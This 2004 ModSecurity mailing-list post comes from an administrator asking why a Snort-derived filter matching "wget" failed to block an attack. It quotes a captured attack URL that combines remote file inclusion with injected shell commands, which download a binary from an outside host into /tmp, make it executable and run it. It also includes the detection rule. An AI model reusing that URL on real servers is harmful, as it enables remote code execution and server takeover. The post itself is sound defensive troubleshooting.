[mod-security-users] Problem with snort rules
From: Danny S. <dsh...@al...> - 2004-02-04 19:19:45
I am working on getting my filters configured for a number of webservers. I used a few filters I found in the snort filters that were converted. However, upon further investigation, it didn't yield what I was looking for. Here is the one I think should be tripped:

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

Here is a real url (slightly modified) that was used to attack a server.

http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&
cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi

I would have expected the wget filter above to block it. Can anyone help me understand why the filter above doesn't block wget? Am I missing the point? Please be gentle.

Thanks.